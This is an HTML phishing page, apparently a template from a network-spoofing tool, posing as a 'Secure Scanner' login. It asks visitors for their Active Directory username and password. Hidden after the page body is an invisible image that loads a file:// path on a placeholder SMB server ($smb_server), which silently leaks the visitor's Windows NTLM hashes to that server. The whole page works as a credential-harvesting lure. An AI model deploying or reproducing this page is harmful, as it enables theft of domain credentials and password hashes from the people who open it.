<!DOCTYPE html>
<style>
@import url(http://fonts.googleapis.com/css?family=Open+Sans:300,400,700);

*{margin:0;padding:0;}

body{
  background:#567;
  font-family:'Open Sans',sans-serif;
}

.button{
  width:100px;
  background:#3399cc;
  display:block;
  margin:0 auto;
  margin-top:1%;
  padding:10px;
  text-align:center;
  text-decoration:none;
  color:#fff;
  cursor:pointer;
  transition:background .3s;
  -webkit-transition:background .3s;
}

.button:hover{
  background:#2288bb;
}

#login{
  width:400px;
  margin:0 auto;
  margin-top:8px;
  margin-bottom:2%;
  transition:opacity 1s;
  -webkit-transition:opacity 1s;
}

#triangle{
  width:0;
  border-top:12x solid transparent;
  border-right:12px solid transparent;
  border-bottom:12px solid #3399cc;
  border-left:12px solid transparent;
  margin:0 auto;
}

#login h1{
  background:#3399cc;
  font-size:240%;
  font-weight:500;
  text-align:center;
  color:#fff;
}

#login h2{
  background:#3399cc;
  font-size:140%;
  font-weight:300;
  text-align:center;
  color:#fff;
}

#login h3{
  background:#3399cc;
  padding:20px;
  font-size:75%;
  font-weight:100;
  text-align:center;
  color:#fff;
}

form{
  background:#f0f0f0;
  padding:6% 4%;
}

input[type="username"],input[type="password"]{
  width:92%;
  background:#fff;
  margin-bottom:4%;
  border:1px solid #ccc;
  padding:4%;
  font-family:'Open Sans',sans-serif;
  font-size:95%;
  color:#555;
}

input[type="submit"]{
  width:100%;
  background:#3399cc;
  border:0;
  padding:4%;
  font-family:'Open Sans',sans-serif;
  font-size:100%;
  color:#fff;
  cursor:pointer;
  transition:background .3s;
  -webkit-transition:background .3s;
}

input[type="submit"]:hover{
  background:#2288bb;
}
</style>

<html>

<head>

  <meta charset="UTF-8">

  <title>Secure Scanner - Login</title>

</head>



<body>

<div id="login">
  <div id="triangle"></div>
  <h1>Log in</h1>
  <h2>You have [3] scans waiting</h2>
  <h3>Please enter your Active Directory username and password</h3>
  <form method="POST" action="/ssdp/do_login.html" name="LoginForm">
    <input type="username" name="username" placeholder="Username" />
    <input type="password" name="password" placeholder="Password" />
    <input type="submit" value="Log in" />
  </form>
</div>



</body>
<img src="file://///$smb_server/smb/hash.jpg" style="display: none;" /><br>
</html>
